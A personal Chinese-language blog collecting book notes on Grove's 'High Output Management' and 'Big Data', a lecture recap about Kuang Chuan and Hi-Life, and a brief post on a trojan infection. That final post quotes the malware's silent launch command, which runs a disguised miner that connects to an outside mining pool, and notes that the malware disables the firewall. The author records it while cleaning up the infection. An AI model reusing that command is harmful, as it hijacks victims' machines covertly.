我讀 «葛洛夫給經理人的第一課» – 2

什麼是產能呢? 葛洛夫說: 產能 = 黑箱中不同部門的產出 / 此項產出需要的人力.

這邊的黑箱就是前一篇中提到早餐店的業務, 我們有原料輸入、人力投入、和產品輸出. 至於如何做到的? 對於外界、或是連鎖店的大老闆就是一個黑箱. 裡面的營業祕密只有透過指標才能管理. 為了增進產能, 我們可以減少投入人力工時、或是激勵員工; 但更重要的是我們可以改變工作的本質, 也就是換個做法. 如果有一個更有效率的做法, 葛洛夫稱它為槓桿. 提高槓桿率 (leverage) 就成了管理的重要課題.

我們應該檢討我們做事的步驟, 質疑每一個步驟存在的理由.對一個經理人來說, 他的日常活動可能是開會、溝通協調, 而前面又講過活動不是指標, 因此經理人應該減少他多餘的活動, 把注意力放在產出上面.

經理人的產出 = 他直接管轄的部門產出 + 他間接影響所及的部門產出

經理人的事情和家庭主婦一樣, 永遠都做不完, 永遠可以做更多, 也永遠超出負荷. 因此經理人更應該提高他的槓桿率. 經理人應該重視口頭的簡短報告, 到處走動以收集情報. 不過這並不表示他不需要書面報告. 葛洛夫說報告用來表示一個人的自律, 遠勝於他在傳達資訊上的作用. 寫報告很重要, 但看不看就在其次. 英特爾會設計一些小活動讓主管可以名正言順地在部門間走來走去, 又不會讓員工覺得被監視或是被打擾. 例如他讓經理們擔任清潔週的評審. 當經理走來走去, 員工就更有機會逮住他們問問題.

主管的工作當然也包括決策. 決策的形成往往需要蒐集資料, 如果沒有經過蒐集資料的過程, 決策的品質就只限於經理人過去的經驗值, 這並不是個好的做法. 有時候經理人並不明確地下指令, 葛洛夫稱它為 “發出警訊", 這個動作只是在做方向的引導, 有時候要發出很多次警訊之後, 才能做出最後的決定! 雖然經理人一天當中大多數的活動都是開會, 但還是能夠提高槓桿率.

經理人的產出 = 組織產出的總和 = 槓桿率 A x 活動 A + 槓桿率 B x  活動 B +  槓桿率 C x  活動 C + …

顯然, 這跟投資組合很像. 我們慎選管理活動的組合, 就像選投資組合一樣, 槓桿率等於報酬率, 選活動等於選投資標的. 同理, 某些活動的槓桿率是負的. 例如關鍵人物缺席了一個會議,此時不但沒有產生正面效益, 也浪費了其他人的時間. 另一方面, 主管舉棋不定的動作或是悲觀的態度都會對整個團體帶來很高的負槓桿率. 要提高槓桿率, 有很多事情可以做. 回到早餐店的例子, 監督要趁早, 退掉壞掉的蛋總是比較容易.如果你要求一份報告, 那麼應該先看到草稿, 而不是等員工連美工都做完了才看到第一眼.

增進經理人產出最明顯的方法就是增進其工作速度.按照下面的公式. 我們可以知道: 減少時間、提高槓桿率、增加活動都可以增加產能.

  [註 1]

站著開會就是節省時間的方法之一, 類似 Scrum [2] 那樣. 還有就是把類似的工作集中在一起做.葛洛夫提出幾個點:

1. 找出限制的步驟: 例如早餐店的蛋. 

2. 類似的工作集中一起做. 例如集中在同一個時段做簽核的動作, 和思考的時間錯開.

3. 管好行事曆. 記住答應一件事就是拒絕另外一件事, 必須有成本的觀念.

4. 建立指標.例如對於每一件事要做多久有個概念.

5. 存貨法. 經理人要有一些 “存貨", 隨時知道有那些本來不緊急的事情可以去做, 避免沒事就去干涉部屬.

6. 標準化. 建立標準流程以節省時間.

針對最後一點. 葛洛夫有個好玩的想法. 經理人因為經常被打斷, 所以正好可以用標準化的方式, 把一些事情移到例行會議去討論.而不是像管理顧問講的, 找個地方躲起來.

[ref]

1. 這本書翻譯得相當流暢, 不過這邊出錯了. 它把原文的這個公式, 翻譯成這樣:

2. Scrum 小檔案

我讀 «葛洛夫給經理人的第一課» – 1

話說上次去北京的時候,剛好有點時間在機場的書店裡候機. 當場翻了兩本管理的書, 一本日系、一本美系, 講得東西完全不同.倒底選哪一本好呢? 經過一番掙扎之後, 就買了葛洛夫 (沒錯! 就是 Intel 的總裁 – Andrew S. Grove) 寫的這一本 <High Output Management>, 因為他講到了 "彼得原理", 我剛好想要這個問題瞭解更深入一點.

這本書一開始藉由分析一家早餐店的生意來進入正題. 在這家早餐店中, 他們提供水煮蛋、奶油吐司、和熱咖啡三種服務. 要怎麼樣快速地供應這份餐點, 我們可以找出那個步驟是最慢的. 無疑地, 需要煮三分鐘的水煮蛋是整個生產流程的 "限制步驟" (limiting step). 因此最佳化的內容必然是圍繞著水煮蛋來進行. 蛋還沒煮好, 咖啡就不急著倒, 土司也不急著烤.

不分企業的大小, 我們都可以將它的工作流程做拆解.至少生產過程會包括製造流程、組裝、和測試. 我們把水煮蛋、奶油吐司、和熱咖啡放進一個托盤, 也可以稱為組裝, 至於測試, 可能就是再驗一下蛋有沒有煮破? 吐司或咖啡是否冷掉了? 聰明人或許已經想到: 為何要等到組裝好才測試? 沒錯!我們要愈早測試愈好. 因為愈接近成品的半成品愈值錢, 我們希望報廢的是最上游的原料, 說不定還可以退貨. 但是煮熟的蛋可能就沒辦法退給蛋商了.同樣的, 投到公司的履歷價值低, 已經面試過的應徵者價值高,已經訓練過、賦予重任的員工價值更高.

為了能夠很快地煮蛋, 我們可能專門引進一台煮蛋機, 只要不斷地投入生蛋, 另外一端就會在三分鐘後送出熟蛋. 如此一來, 我們可能立刻就拿到三分鐘前煮好的蛋, 而不是再等三分鐘. 不過這樣一來, 又產生了好幾個新的問題: (1) 蛋會產生半成品的庫存, 直到早餐時間結束之後的三分鐘,還是會生出不少剛煮好的蛋. (2) 如果客人想要點糖心蛋, 指定只能煮 2 分鐘, 我們也沒辦法提供. (3) 煮蛋機需要維修, 也可能臨時故障. (4) 整個工序的瓶頸可能變成烤土司…雖然系統會變複雜, 但是整體的利潤有可能會比原來沒機器的時候更好.

葛洛夫說,要管好你的早餐店需要有一些指標. 首先包括: "一天的銷售預測" "原料庫存", "設備的狀況", "人力資源", "人力資源品質". 指標不等於活動,好比說業務打了 100 通電話是活動, 而找到真正的客戶是指標. PM 開了10 個案子是活動, 真正能從客戶那賺到錢才是指標.搞清楚了指標之後, 還可以找出配對指標. 例如交貨品質就是交貨期限的配對指標, 提醒我們這裡有管理工作要做.指標猶如在管理活動的黑箱上開了個窗口, 讓管理者可以看到倒底發生了什麼事?

這邊又談到品質的檢驗,我們可以採用海關法和監視器法. 海關的方法是指一關一關地檢驗, 避免任何問題的發生. 而監視器法是指允許瑕疵品通過, 但是連續發生瑕疵時要停掉生產線. 介於兩者之間的就是隨機抽樣了. 葛洛夫說, 像是申請簽證這件事就適合隨機抽樣,因為出問題的比例相當低, 不適合投入大量成本去審查. 書上另一個關於成本但比較不人性的例子是: 起訴一個犯人要花很大的社會成本, 但是僅僅因為監獄關不下就讓犯人提早假釋, 就是捨本逐末的做法. 套用前面半成品的理論- 還沒抓到的犯人最不值錢, 都已經審判完了還不執行 – 相當把產品堆在庫房裡而不拿去賣.

本書讀到這裡, 感覺有點小收穫.但其實這只是熱身而已, 後面很快就會看到葛洛夫的管理精髓.

 

第十八屆交大高階經理人培訓班第四課

本次的講師是臨危受命, 來代打的汪群凱學長. 汪學長的蒞臨指導對我來說有兩處新意,首先他不是交大的校友, 其次他也不是公司的董事長或是總經理.(謎之音: 你上次不翹課的話, 曾志朗教授也同樣符合這兩個條件. 不過那也不能怪我, 都是為了螃蟹養的那隻鳳凰才會缺席的…) 汪學長要我們稱呼他 Kenny, 他是光泉的董事,董事長特助,也是光泉集團 (包括萊爾富) 的小王子. 光泉就是由汪學長的祖父所創立的. 另外, 汪學長是小留學生, 在加拿大念書, 在台灣的學歷是政大企家班第 30 期的樣子.

話說學長準備的投影片相當地簡潔, 他說既然高階經理人培訓班要培養高階經理人和總經理, 他就少講一點牛奶和便利商店, 講講他做事的心得. 汪學長從 Who am I 講起,他說最早 "阿祖"是在迪化街賣紅豆湯、花生仁湯, 後來和賣油條的合作, 才有了店面. 接著賣果汁以及麵包. 因為當時 (1956 年) 吃麵包都會喜歡配牛奶, 所以他們也買牛奶來賣. 但是汪家的長輩覺得買來的牛奶都水水的, 乾脆自己養牛來擠牛奶算了, 於是乎汪家以三棟房子的價格 (8 萬元) 買了三頭牛來供應牛奶.後來牛奶變成本業, 日後就成了光泉牛奶的品牌.

當然, 為了喝牛奶而養頭牛並不是件容易的事. 有天不小心死了一頭牛, 全家人都抱頭痛哭, 還好另外兩隻牛沒事, 生意漸漸做起來.台灣的小牧場其實也不少, 像是四方、將軍也都是品牌, 但是光泉為何能從北味全南統一的夾擊下搶到第三名呢? 原因在於光泉公司其實頗有創意行銷的因子在裡面. 我小時候的 "雪克 (shake) 33" – 搖 33 下再喝, 台灣第一個利樂包飲品, 引進香吉士品牌, 到光泉茉莉蜜茶、冷泡茶都算是有突破或是有話題.

萊爾富超商創立於 1989 年, 而汪學長回台灣的時候 (2002 年),三大超商已經競爭激烈. 學長說他主修數學, 第一份工作是在國外當 QA, 所以他對於科技的東西相當有興趣.當時連日本超商都對於在超商裝設 MMK (Multimedia Kiosk) – 多媒體機有所保留, 但汪學長花了十八個月的時間 (2003/5~2004/11), 讓每一家萊爾富幾乎都有一台,據說這是台灣的創舉. 可惜先行者的優勢沒有持續太久, 7-11 很快也就有 ibon, 全家有 Famiport, 名頭都比萊爾富的 Life-ET 要響亮! 何以故? 據說萊爾富的策略是自己先低調, 等別人炒熱之後,就可以節省廣告費.因此, 即便第一個有電子錢包、第一個收停車費、第一個賣門票、第一個賣年菜的都是萊爾富, 但是大家的印象不太深刻呢!

當年汪學長加入光泉的時候, 雖然年輕有抱負, 但是一時之間也得罪了不少人. 比方說要做 MMK 時, 就搶了 IT 的工作. 學長想按照自己的方法做事, 也就等於要否定 IT 和他不同的想法. 為了證明自己不是官大學問大,他也上了 560 個小時的 IT 課程, 考了 MCSA 等執照來證明自己有專業. 但十年過去, 學長的想法已經轉變了, 他認為做人比較重要, 因為企業就是人的組合. 要做高階經理人, 首先就要搞定自己. 一般人都愛講道理, 得理不饒人, 但得了理就失了人. 因此職務愈高就愈不能靠講道理, 不要想著對, 要想著怎麼修正到最好 – 這是學長看完 KANO 後對劇中 slogan 的詮釋. 

學長說, 汪家的傳家寶就是…不能講. 講一點點的話就是度量和德行. 最難能可貴的就是要有度量. 人家批評你當然會很難過, 但是能把這些話聽進去最可貴, 所以才叫做難能可貴. 搞定了自己, 才能搞定組織. 做主管的時候, 不要想著自己, 要想著其他人. 這樣才能無私, 包括不藏私. 雖然好主管不只一種, 但是學長信服的說法是要做僕人式的領導.要當一個創造環境的人, 自己厲害不算厲害, 組織成功才叫厲害.

在企家班的時候, 司徒達賢老師有一句話讓學長奉為座右銘, 他也用這個來和我們作為分享的總結. "官位愈高, 聽力要愈好." 這句話有多種的意涵. 首先很多人會說奉承話, 要能過濾掉. 很多人說真話, 但是不中聽, 要能聽進去. 很多人互相指責, 要能聽出是非黑白. 所以說長官的聽力很重要.

主題很快講完, 學長抱歉地說他講太快了. 此時校友會的陳總幹事拱學長多講點牛奶和便利商店…的確, 前面講的很快, 光泉的歷史其實是這個階段才開始講的.我想後面應該就是 Q&A 了, 我該問問題嗎? 學長在前面講到, 要讓員工能夠放手去做事情, 不要和員工爭論對錯. 這時我心中浮現一個畫面: 如果我有一個 A 員工, 一個 B 員工. 若 A 員工和 B 員工爭論, 那我老闆要不要出來判斷對錯? 如果我說 A 對, 那跟我直接和 B 爭論有啥不同? 

其實我走到停車場要離開的時候都還在想這個問題.天氣冷颼颼的, 我邊走大概邊想通了. 學長的出發點是要講求人和, 如果主管明知道 A 對 B 錯, 當然要管上一管. 除非主管自己也不知道對錯, 而手下又只有一個 A (甚至是 B) 才會放手他們自己去嘗試錯誤. 如果主管站在 A 的立場幫他打通關節、站在 B 的立場幫他找台階下,這樣應該是 OK 的. 謎之音說, 怎麼上課不問呢? 因為太多人問問題了, 我想聽人家問什麼嘛…

Q&A 的部分, 當然要講點牛奶. 光泉是以牛奶起家的, 學長對自家的乳品當然充滿信心! 他說早期講到牛奶, 一定是光泉的牛奶最好. 別家的牛奶都不如光泉的濃. 但是後來統一推出高檔品牌瑞穗鮮乳, 味全推出林鳳營, 大家的差別就不大了. 正常的牛奶乳脂肪含量大概是 3.2~3.8%, 如果乳脂肪含量更高,喝起來會更香濃, 不過那就是造出來…., 只要把低脂鮮乳的脂肪加到一般鮮乳, 就可以做出高脂肪的 "優質鮮乳". 根據我 Google 的結果, 不過現在超過 3.8% 乳脂肪含量的牛奶還真多咧 [1]. 另一方面, 所謂的低脂鮮乳也不見得低脂, 光泉的低脂倒是比較名符其實.

有人問到萊爾富要如何勝過 7-11 和全家. 學長說因為店數的關係, 目前三大超商的店數是 4:2:1, 萊爾富站在比較不利的位置.過去有很多創新的話題, 也有享受到一點 first mover 的優勢. 不過要突破僵局, 需要有不同的作為. 汪學長說他的父親 – 汪賜發董事長考慮讓光泉上市, 引進外部的資金來對抗另外兩大超商. 畢竟小 7 的背後有統一和美國母公司, 全家的背後是日本企業.而光泉只是家族企業, 汪董想把 "家族企業" 變成 "企業家族". 至於如何在家族和企業中取得平衡, 我想這就是現任董事長 – 學長爸爸所要傷腦筋的吧!

最後, 我講點個人的感想. 汪學長讓人感覺是一個滿真誠、好相處的人.對於很多犀利的提問, 都能坦然回答. 有人不禮貌地問萊爾富何時要收掉 (因為只是第三大), 他也只是笑笑說萊爾富不會收, 第三名還是有骨仔肉可以啃. 如果第三大 = 要收掉, 那汽車應該也只剩下兩個牌子了吧! 汪學長說, 這幾次食安風暴都沒有掃到光泉 (除商業週刊那次賀爾蒙事件可能是誤報之外), 可見得光泉的品質好. 學長說光泉對酪農的要求嚴格, 以至於有 10% 品質不合格的酪農跳槽到別家. 光泉的牛奶, 他們自己家也都在喝, 品質沒問題. 我想如果企業的核心價值能夠守住, 又可以進軍到大陸市場的話, 光泉集團應該是大有可為的.

[REF]

1. 牛奶須知

2. 汪賜發 貴為董事長 家裡沒傭人

 

我讀 «大數據»

本書 – 大數據 (Big Data) 的作者是麥爾荀伯格 (Viktor Mayer-SchÖnberger) 和庫基耶 (Kenneth Cukier) 兩位, 它的副標題是 A Revolution that Will Transform How We Live, Work, and Think, 由天下文化出版.

Big Data 這個名詞近來很紅, 顧名思義, 會讓人聯想到我們有很多資料可以用, 所以我們可以…. 不過對於它的內涵, 一般人還是不甚了了, 這也就是為什麼大年初二我會在 7-11 買它的原因. 我想大家可能都聽過 Google 可以用關鍵字搜尋來預測流感發生的區域, 這是相當著名的一個資料探勘 (data mining) 應用. 不過 big data 和更早之前講到的 data mining 究竟有甚麼不同呢?

根據本書的說法, big data 代表 “樣本 = 母體", 也就是完全沒有抽樣, 這是 big data 的第一大特徵. Farecast 公司專門預測飛機的票價, 創辦人伊茲奧尼 (Oren Etzioni) 所使用的資料庫是某個旅遊網站的一萬兩千筆票價資料. 他用這個資料庫建立一個模型, 告訴想買機票的人, 現在的報價將會上漲或是下跌. 當他創業成功後, 他所使用的資料庫也愈來愈大, 據說現在有兩千億筆的票價紀錄. (呃, 能夠順便告訴我世界先進接下來會漲還是會跌嗎?) 總而言之, 使用 big data 的人不需要有特別考量專業背景 (know why), 只要讓資料說話 (know what).

這使我想起當初在做文字識別的時候, 我們最重視的是主觀的特徵 (feature), 比方說有人會用字的外緣軌跡 (contour)的梯度 (gradient) 來當作特徵, 這樣就會比取字形的投影量 (histogram) 厲害.我們先有想法, 然後才去實驗它是否可行? 這一點到了 big data 的時代看起來還是沒變, 我們還是需要測試, 只不過我們用的資料庫變大了. Know Why 的比重降低, Know What 的比重提高. 我們不太需要大師想出震古鑠今的 “特徵",什麼高招低招都可以一併拿出來用, 只要資料庫夠大, 我們可以靠實驗為所有的特徵分配比重.不再需要單一的辨識之神, know what > know why 可以說是 big data 的第二個特徵.

對於 “樣本 = 母體" 這部分, 我仍然可以用模式識別 (pattern recognition) 來說明. 19 年前, 我們去加拿大向孫靖夷教授求教, 他說訓練辨識用資料庫裡面要乾淨,把一些奇怪的字 (這裡指的是手寫數字) 剔除, 此時訓練出來的資料庫才不會有太大的變異 (variance), 進而影響辨識的效果.不過在 big date 裡面, 其實並不分訓練用的資料庫和實際應用的資料庫, 它們就是同一個, 所以怪怪的資料並不會被剔除. 就算要剔除這些資料, 也要專家說了才算吧! – 而這恰好違背了 know what > know why 的原則, 因此沒有人會去整理資料庫,雖然 garbage in garbage out, 但它們自然會被淹沒在大多數都是正確的資料海當中 (p23).

怪怪的資料也包括缺損的類型, 舉例來說, 傳統的資料庫軟體都有許多欄位要填, 但是我們所蒐集的部分資料可能就是少了那麼幾欄, 在這種情況之下仍然要能資料化 (記錄整理)、數位化 (能讓電腦讀取)將這筆數據放進資料庫 (data base), 就成了新式資料庫軟體的挑戰. 書上有個不錯的例子是有關於亞馬遜書店的書評. 最初亞馬遜雇用了一群專家來寫書評, 他們會為我們買的書推薦相關讀物作為延伸閱讀, 以便進一步刺激銷量.

不過實際上,讀者不一定想當領域的專家. 如果我已經買了 <Big Data>, 它又推薦我買 data mining, 我應該會瘋掉.結果亞馬遜在做完實驗後, 解僱了這些專業書評, 改採統計式推薦. 當初買這本書的人又買了什麼? 它就會直接推薦給我們, 亞馬遜也不知道為什麼? 但它比專家還有效, 亞馬遜的業績有 1/3 來意推薦名單. 而 Netflix 租片訂單有 3/4 來自電腦推薦系統. Why? 沒有那麼重要. 如果真的花大筆資金和人力, 找出人類潛意識的規則, 能夠把 Netflix 的推薦名單效用再倍增嗎? 也許不能. 乾脆就這樣不求甚解下去好了.我們只要知道相關性 (correlation), 不用知道因果.

相關性也是一個有趣的東西, 我們想知道銷售量和哪些東西相關, 當然就希望 “哪些" 不只是一些些, 而是所有的可能的資料. 基於這個原因, 原先沒有被發掘的特徵也都數據化了, 例如地理位置.當然, 對方要是能夠知道我們的種族、血型、星座、收入…, 也絕對不會放棄這個機會. 這也就是大公司喜歡收集我們訊息的理由. 微軟、谷歌都會要求我們參與他們的改進計畫, 以便蒐集更多的用戶軟硬體配備資訊. 甚至還有人讓我們當免費的廉價勞工.

馮安 (Luis Von Ahn) 第一個想到用圖形上的文字來測試輸入者是人類還是電腦程式 – Completely Automated Public Turing Test to Tell Computers and Humans Aprt (Captcha). 他的發明真的擋掉了許多想測試密碼的機器人, 不過也害得我們有時根本看不清哪張圖上面的字是什麼鬼, 而進不了自己的帳號. 因為馮安在推出第二代 Captcha – ReCaptcha 的時候, 順便把 Google 文字識別也認不出來的字參雜在其中. 如果有五個人的答案都一樣, Google 就可以把它加入資料庫. 也就是說, Google 每天可以省下 400 萬美元的工讀生認字費用去認那兩億個字. 而我們還以為它知道答案呢!

由此可以見, 資料庫不但可以拿來使用, 還能請君入甕. 上面這個例子是 Google 把資料庫借給 Captcha, 而 Captcha 又回饋給 Google 的例子. 於是我們可以看到資料庫的釋出可以帶來雙贏的好處. 釋放資料庫的附加價值有三個: 重複使用資料、合併資料庫、找到買一送一的情況 (p147).

所謂重複使用資料就是把資料活化, 把原本用途 A 的資料放在用途 B 來用. 合併資料庫的例子是把戶政, 疾病, 年收入三個資料庫做相關性比對. 買一送一的例子是 Google 的街景車一面搜集街景資料, 一面記錄 WIFI 訊號, 以便日後可以靠 WIFI 基地台的位置加強定位的精准度. 顯然, 某些資料會有保存期限, 比方說 WIFI  SSID 換了, 就要重新再搜集.

誰可以從 big data 獲利呢?包括資料持有人, 資料專家, 和有巨量資料思維者 (p182). 擁有大量資料的臉書, 谷歌, 微軟, 雅馬遜無疑是大贏家, 所以大公司絕對有利. 而小公司只要有想法, 能夠找出應用, 他們大可以去買別人的資料庫來用, 甚至可以用免費的 [1]. 因此最不具競爭力的就是中型公司. 

最後本書講到道德問題. 我們有了巨量資料, 搭配上某個演算法, 似乎就可以輕易地破壞隱私權,  或是事先預防犯罪. 但是就如同人肉搜索有其不道德的一面之外, 就算我們根據統計資料計算出某個罪犯不應該被假釋, 我們也不應該違反無罪推定, 先入人於罪. 書上說到, 使用 big data 需要三條管控策略來規範.

1. 將資料保護由個人同意制, 改為使用者責任制. 我們在很多時候都會簽署同意對方使用個資的條文, 例如辦信用卡, 求職等等. 但我們當下的同意, 並不表示銀行可以一直打電話來叫我們貸款或是買保險. 這就是責任制比同意制好的地方. 我們的同意必須有時空的限制.

2. 運用 big data, 要尊重每個人的能動性. 這個意思是說, 不能用它作為有責任或義務的推論. 比方說保險公司不能夠因為某人是 50 歲的獨居失業男子, 就不准他買保險. 在這個狀況下, 保險公司反而有義務公佈他們的資料庫, 演算法, 讓專業的第三方認證, 且當事人可以反駁精算師的預測.

3. 培養演算專家這種審計師來稽核 big data 的使用.

綜觀全書, 它給了我們關於 big data 的宏觀描述, 也提到它的效用與道德風險. 不過就如一開始所說到的, big data 只能告訴我們大多數的情況下是怎麼發生的, 並不能解釋其原因, 也不能涵蓋所有的個案. 我在讀的另外一本書 <黑天鵝效應> 剛好就在講例外的那一部分甚至比常態的那部分更重要. 這兩本書算是互補.

[ref]

1. 免費-google Cloud SQL 雲端資料庫服務

木馬病毒小記錄

前陣子看到開機之後, 都會有一個 spoolv 佔了系統 80% 的運算量, 把它砍掉之後就好了. 雖然知道是病毒, 但還是不明就裡?

結果昨天不但在 windows 底下看到 panther 病毒的目錄, 還看到一個 mix 目錄, 裡面就有 spoolv. 再找一找, 也在 c: 的根目錄找到一個 iexplore.exe, 也在啟動裡面找到它的發動機 – sh 檔.

它的感染流程我還不知道 – 沒有像百度千千靜聽和 QVOD 會導致 hao123、sanpdo、QVO6 …那麼明顯, 但是啟動流程大致就是由 Windows 啟動時的 shell script 帶頭, 執行下面一段指令.

%SystemRoot%mixhstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%mixspoolv32" /HIGH "%SystemRoot%mixspoolv32iexplorer.exe -o stratum+tcp://cat.or.gs:3333 -O geox.1:x"

簡單地說, 它要到 c:windowsmix 底下執行 hstart.exe, 然後跑一個很小的 iexplore.exe. 從工作管理員看來, 只會看到這個熟悉名字, 一時不會覺得奇怪.不過若是去點它的 "內容" –> "數位簽章", 就知道這不是 Microsoft 發行的.

我覺得它最厲害的地方就是 tcp 到 cat.or.gs 了.這個 ip (162.212.255.218) 看起來是大陸的, 也就是收集資料的主機. 但它怎麼能確定 port 3333 是開著的呢? 因為它主動把防火牆給關了.因此防火牆被關也是一個重要徵兆.

至於 Panther 應該和它們不是同一個家族, 不過它的名氣也比較大.比較容易被防毒軟體認出來. 我的 Norton 或是趨勢的防毒軟體都沒抓到那個假 iexplore.exe, 後者只有在它執行的時候, 才會問要不要封鎖而已.

[20140228 補充]

1. 基本上, 趨勢的 PCcillin 是比較抓不到病毒的. 相形之下, Panda Antivirus Pro 試用版可以在 PCcillin 之後又抓出 14 個病毒. 當我再換成 Norton Antivirus 之後, Norton 說要把 PCcillin 反安裝, 但是它卻不排斥貓雄.

金山毒霸廣提示視窗然多, 但是它在貓熊和 Norton 之後還找出更多的病毒, 只是有個 Microsoft.com 病毒消不掉. 當三個防毒軟體病毒同時存在時, 貓熊就被排斥了, 一開起來就閃退. Norton 和毒霸相安無事.